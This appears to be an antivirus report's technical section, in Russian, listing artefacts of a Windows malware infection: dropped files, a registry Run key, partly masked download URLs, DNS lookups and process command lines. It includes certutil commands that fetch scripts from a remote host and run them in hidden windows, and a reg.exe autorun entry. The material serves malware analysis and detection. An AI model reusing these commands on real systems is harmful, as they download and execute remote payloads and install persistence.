Техническая информация
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'ZoomNpc' = '%APPDATA%\Zoomnpccs\olis.vbs'
- '%TEMP%\mqbgbls.exe'
- %TEMP%\mqbgbls.exe
- %TEMP%\8af0.tmp\8b01.tmp\8b02.bat
- %APPDATA%\npccs\filemaker.bat
- %APPDATA%\npccs\fms.vbs
- %APPDATA%\npccs\olis.bat
- %APPDATA%\npccs\olis.vbs
- %APPDATA%\npccs\candown.n
- %TEMP%\8af0.tmp\8b01.tmp\8b02.bat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\candown[1].n
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\candown[1].n
- http://wi######gamestudio.ueuo.com/FlareonzWasHere/filemaker.txt
- http://wi######gamestudio.ueuo.com/FlareonzWasHere/fms.txt
- http://wi######gamestudio.ueuo.com/FlareonzWasHere/olis.txt
- http://oc##.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D
- DNS ASK wi######gamestudio.ueuo.com
- DNS ASK dr##box.com
- DNS ASK uc#############bd7569ee77699.dl.dropboxusercontent.com
- DNS ASK oc##.thawte.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\npccs\fms.vbs"
- '<SYSTEM32>\wscript.exe' "%APPDATA%\npccs\olis.vbs"
- '%TEMP%\mqbgbls.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\8AF0.tmp\8B01.tmp\8B02.bat %TEMP%\mqbgbls.exe"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C filemaker.bat' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C olis.bat' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\8AF0.tmp\8B01.tmp\8B02.bat %TEMP%\mqbgbls.exe"
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://wi######gamestudio.ueuo.com/FlareonzWasHere/filemaker.txt filemaker.bat
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://wi######gamestudio.ueuo.com/FlareonzWasHere/fms.txt fms.vbs
- '<SYSTEM32>\cmd.exe' /C filemaker.bat
- '<SYSTEM32>\certutil.exe' -urlcache -split -f "http://wi######gamestudio.ueuo.com/FlareonzWasHere/olis.txt" olis.bat
- '<SYSTEM32>\cmd.exe' /C olis.bat
- '<SYSTEM32>\reg.exe' ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f /v ZoomNpc /t REG_SZ /d "%APPDATA%\Zoomnpccs\olis.vbs"
- '<SYSTEM32>\certutil.exe' -urlcache -split -f "https://www.dr##box.com/s/aeko82i8tim6aka/canDown.n?dl### canDown.n